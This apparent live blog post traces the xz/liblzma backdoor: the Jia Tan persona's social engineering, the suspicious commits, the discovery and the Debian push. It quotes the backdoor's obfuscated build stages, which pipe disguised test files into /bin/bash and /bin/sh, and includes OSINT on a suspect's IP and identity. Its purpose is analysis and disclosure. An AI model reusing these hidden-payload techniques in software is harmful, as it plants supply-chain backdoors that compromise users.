Everything I Know About the Xz Backdoor

state: unstable
in: blog
date: 3/29/2024

😖 Unstable

Updating at the speed of light, blink once and a word could be gone! These nodes are erratic, unstable, dangerous, but that's why they are fun.

Please note: This is being updated in real time. The intent is to make sense of the many simultaneous discoveries regarding this backdoor. Last updated: 11:30 AM EST

Update: The GitHub page for xz has been suspended.

2021

JiaT75 (Jia Tan) creates their GitHub account.

The first commits they make are not to xz, but they are deeply suspicious. Specifically, they open a PR in libarchive: Added error text to warning when untaring with bsdtar. This commit does a little more than it says. It replaces safe_fprintf with the unsafe fprintf, potentially introducing another vulnerability. The code was merged without any discussion, and ~~lives on to this day~~ (patched). libarchive should also be considered compromised until proven otherwise.

2022

In April 2022, Jia Tan submits a patch via a mailing list. The patch is irrelevant, but the events that follow are not. A new persona, Jigar Kumar, enters and begins pressuring for this patch to be merged.

Soon after, Jigar Kumar begins pressuring Lasse Collin to add another maintainer to XZ. In the fallout, we learn a little bit about mental health in open source.

Three days after the emails pressuring Lasse Collin to add another maintainer, JiaT75 makes their first commit to xz: Tests: Created tests for hardware functions. After this commit, they become a regular contributor to xz (they are currently the second most active). It’s unclear exactly when they became trusted in this repository.

Jigar Kumar is never seen again.

Glyph ^{@glyph@mastodon.social}

@eb I really hope that this causes an industry-wide reckoning with the common practice of letting your entire goddamn product rest on the shoulders of one overworked person having a slow mental health crisis without financially or operationally supporting them whatsoever. I want everyone who has an open source dependency to read this message https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html

^{Mar 29, 2024, 20:43} ^{505 retoots}

2023

JiaT75 merges their first commit on Jan 7 2023¹, which gives us a good indication of when they fully gained trust.

In March, the primary contact email in Google’s oss-fuzz is changed from Lasse Collin’s to Jia’s.

Testing infrastructure that will be used in this exploit is committed. Despite Lasse Collin being attributed as the author for this, Jia Tan committed it, and it was originally written by Hans Jansen in June:

Hans Jansen’s account was seemingly made specifically to create this pull request. There is very little activity before and after. They will later push for the compromised version of XZ to be included in Debian.

In July, a PR was opened in oss-fuzz to disable ifunc for fuzzing builds, due to issues introduced by the changes above. This appears to be a deliberate attempt to mask the malicious changes that will be introduced soon.

2024

A pull request for Google’s oss-fuzz is opened that changes the URL for the project from tukaani.org/xz/ to xz.tukaani.org/xz-utils/. tukaani.org is hosted at 5.44.245.25 in Finland, at this hosting company. The xz subdomain, meanwhile, points to GitHub pages. This further increases the control Jia has over the project.

A commit containing the final steps required to execute this backdoor is added to the repository:

The discovery

An email is sent to the oss-security mailing list: backdoor in upstream xz/liblzma leading to ssh server compromise, announcing this discovery and doing its best to explain the exploit chain.

AndresFreundTec ^{@AndresFreundTec@mastodon.social}

I was doing some micro-benchmarking at the time, needed to quiesce the system to reduce noise. Saw sshd processes were using a surprising amount of CPU, despite immediately failing because of wrong usernames etc. Profiled sshd, showing lots of cpu time in liblzma, with perf unable to attribute it to a symbol. Got suspicious. Recalled that I had seen an odd valgrind complaint in automated testing of postgres, a few weeks earlier, after package updates.

Really required a lot of coincidences.

^{Mar 29, 2024, 18:32} ^{619 retoots}

A gist has been published with a very good high-level technical overview and a “what you need to know”.

I understand this chain even less than the original author, but here is me half reciting, half making sense of what’s happening:

This isn't good yet, I'm still figuring it out

Code is added to the upstream tarballs that injects an obfuscated script from the files committed above to be “executed at the end of configure”. This code, in turn, “modifies $builddir/src/liblzma/Makefile to contain”

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

(you’ll notice this was the file added above) “which ends up as” (what ends up as?)

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;
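To make the first two stages of that pipeline less mysterious, here is a minimal shell sketch that runs them on harmless text instead of the real test file. It rests on two assumptions: that `sed rpath FILE` is parsed as the sed command `r path` (append the contents of a file named `path` after each line), which simply prints FILE unchanged when no file called `path` exists in the current directory, and that `tr` treats the escaped `\-` as a literal dash. The names `disguised_cat`, `swap_chars` and `sample.txt` are mine, purely for illustration.

```shell
#!/bin/sh
# Stage 1: looks like a linker-flag tweak, but behaves like `cat FILE`
# as long as no file named "path" exists in the current directory.
disguised_cat() {
    sed rpath "$1"
}

# Stage 2: swap tab <-> space and '-' <-> '_' (same sets as in the pipeline).
swap_chars() {
    tr "\t \-_" " \t_\-"
}

# Demo in a scratch directory so a stray file called "path" cannot interfere.
workdir=$(mktemp -d)
(
    cd "$workdir" || exit 1
    printf 'line-one\nline_two\n' > sample.txt
    disguised_cat sample.txt                # prints the file unchanged
    disguised_cat sample.txt | swap_chars   # dashes and underscores swapped
)
rm -rf "$workdir"
```

If that reading is right, the `sed` stage is just a `cat` in disguise, and the `tr` stage is a tiny substitution that presumably turns the deliberately "corrupt" test file back into something `xz -d` can decompress.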

The sed reportedly transforms into

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

You’ll notice this script pipes one of the test files committed above through a long, heavily obfuscated chain of head calls. After deobfuscation, this script leads to a sh file attached in the email:

injected.txt
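The repeated head calls in the script above appear to implement a simple skip-and-keep filter: throw away 1024 bytes, pass through 2048, and repeat. Below is a scaled-down sketch of that pattern. It assumes GNU head, which reads exactly the requested number of bytes from a pipe, so each head picks up where the previous one stopped; other implementations may buffer and behave differently. The function name `skip_keep` and the tiny sizes are hypothetical.

```shell
#!/bin/sh
# skip_keep SKIP KEEP ROUNDS
# Reads stdin; for each round, discards SKIP bytes and then passes KEEP bytes
# through. This mirrors "(head -c +1024 >/dev/null) && head -c +2048",
# only with caller-chosen sizes.
skip_keep() {
    skip=$1
    keep=$2
    rounds=$3
    i=0
    while [ "$i" -lt "$rounds" ]; do
        head -c "$skip" >/dev/null && head -c "$keep"
        i=$((i + 1))
    done
}

# 'xx' plays the role of the junk padding, the letters are the payload.
printf 'xxAAAxxBBBxxCCC' | skip_keep 2 3 3
echo
```

With GNU head this prints `AAABBBCCC`: the payload is interleaved with filler, and only the kept slices are passed on to the later tail, tr and xz stages.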

There are a number of conditions identified that are required for the process to continue:

Building with GCC and the GNU linker
Only x86-64 Linux
Running as part of a Debian or RPM package build

The final binary is reportedly used in some way to bypass sshd authentication checks.
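If you just want to know whether a machine has one of the affected releases, a rough check looks like the sketch below. It assumes the affected releases are 5.6.0 and 5.6.1, as publicly reported under CVE-2024-3094 (this post only names 5.6.1 directly), and that `xz --version` prints a line of the form `liblzma <version>`. The function names are hypothetical, and a clean result here is not proof that a system is safe.

```shell
#!/bin/sh
# Succeeds (exit 0) if the given version string is one of the releases
# publicly reported as backdoored. Assumption: 5.6.0 and 5.6.1 only.
is_backdoored_xz_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Reads `xz --version` output on stdin and prints the liblzma version.
liblzma_version() {
    awk '/^liblzma/ { print $2 }'
}

# Only runs the check when xz is actually installed.
if command -v xz >/dev/null 2>&1; then
    version=$(xz --version | liblzma_version)
    if is_backdoored_xz_version "$version"; then
        echo "liblzma $version is one of the reported backdoored releases"
    else
        echo "liblzma $version is not one of the reported backdoored releases"
    fi
fi
```

Keeping the version comparison in its own function makes it easy to feed in version strings from a package manager instead of from the xz binary.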

A sudden push for inclusion

A request for the vulnerable version to be included in Debian is opened by Hans:

#1067708 - xz-utils: New upstream version available

This request was opened the same week Hans’ Debian GitLab account was created. The account created a few similar “update” requests in various low traffic repositories to build credibility, after asking for this one.

A number of other, suspicious, anonymous name+number accounts with little former activity also push for its inclusion, including misoeater91 and krygorin4545. krygorin4545’s PGP key was made 2 days before joining the discussion.

Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work.

I noticed this last week and almost made a valgrind bug. Glad to see it being fixed.
Thanks Hans!

The Valgrind bugs mentioned were introduced by this malicious injection, as noted in the email to OSS-Security:

Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1:

A pull request to a Go library by a 1Password employee is opened asking to upgrade the library to the vulnerable version; however, it was all unfortunate timing. 1Password reached out by email referring me to this comment, and everything seems to check out.

A Fedora contributor states that Jia was pushing for its inclusion in Fedora as it contains “great new features”.

Jia Tan also attempted to get it into Ubuntu days before the beta freeze.

A few hours after all this came out, GitHub suspended JiaT75’s account. Thanks? They also banned the repository, meaning people can no longer audit the changes made to it without resorting to mirrors. Immensely helpful, GitHub. They also suspended Lasse Collin’s account, which is completely disgraceful.

Lasse has begun reverting changes introduced by Jia, including one that added a sneaky period to disable the sandbox. They also have published a FAQ that begins to explain the situation: XZ Utils backdoor

OSINT

Various people have reached out to me regarding discoveries about the identity of Jia. Some of this has been incorporated in the timeline, but other stuff is “timeless” and so I’m putting it here:

IRC

I received an email from a Debian maintainer that clarified a few points and provided new insight into the situation (I’d like to credit them, and I’ve asked for permission to do so).

It seems “Jia Tan” was present on the #tukaani IRC channel on Libera.chat (I’m not there), but /whois revealed past presence in that IRC network, and the connecting IP, and having left during Mar 29:

22:45 [libera] -!- jiatan [~jiatan@185.128.24.163]
22:45 [libera] -!-  was      : Jia Tan
22:45 [libera] -!-  hostname : 185.128.24.163
22:45 [libera] -!-  account  : jiatan
22:45 [libera] -!-  server   : tungsten.libera.chat [Fri Mar 29 14:47:40 2024]
22:45 [libera] -!- End of WHOWAS

I did a nmap on that IP after that /whois, and the results were a bit strange with tons of ports seemingly open. The IP is from Singapore, but I’d assume either a proxy or a hosted site or similar

Important notes on LinkedIn

I have received a few emails alerting me to a LinkedIn of somebody named Jia Tan². Their bio boasts of large-scale vulnerability management. They claim to live in California. Is this our man? The commits on JiaT75’s GitHub are set to +0800, which would not indicate presence in California. UTC-0800 would be California. Most of the commits were made between 12:00 and 17:00 UTC, which is 04:00 to 09:00 at UTC-0800: awfully early for California. In my opinion, there is not sufficient evidence that the LinkedIn being discussed is our man. I think identity theft is more likely, but I am of course open to more evidence.
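The timezone argument is just modular arithmetic, and a small sketch makes it easy to check. The helper name `utc_hour_to_local` is hypothetical, and it only handles whole-hour offsets; it also takes the UTC-0800 figure above at face value and ignores daylight saving time.

```shell
#!/bin/sh
# utc_hour_to_local HOUR OFFSET
# Converts an hour of the day in UTC (0-23) to the hour in a zone with the
# given whole-hour offset, e.g. -8 for UTC-0800 or 8 for UTC+0800.
utc_hour_to_local() {
    echo $(( ($1 + $2 + 24) % 24 ))
}

# The commit window mentioned above, seen from both candidate offsets.
for hour in 12 17; do
    west=$(utc_hour_to_local "$hour" -8)
    east=$(utc_hour_to_local "$hour" 8)
    echo "UTC ${hour}:00 -> UTC-0800 ${west}:00, UTC+0800 ${east}:00"
done
```

The 12 to 17 UTC window lands at 4 to 9 in the morning at UTC-0800, but at 20 to 1 (evening into the night) at UTC+0800, which matches the +0800 offset recorded on the commits. Of course, a commit's timezone is whatever the committer's machine claims, so this is weak evidence either way.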

Discoveries in the Git logs

I received an email from Minhu Wang who investigated the Git log, and found one instance where Jia’s username was different:

$ git shortlog --summary --numbered --email | grep jiat0218@gmail.com
273 Jia Tan <jiat0218@gmail.com>
2 jiat75 <jiat0218@gmail.com>
1 Jia Cheong Tan <jiat0218@gmail.com>

They found this particularly interesting as Cheong is a much less common name. Make of that what you will.

👟 Footnotes

¹ Thanks @joeyh@hachyderm.io
² I was also alerted to discussions of this on Gab, which should tell you what you need to know.
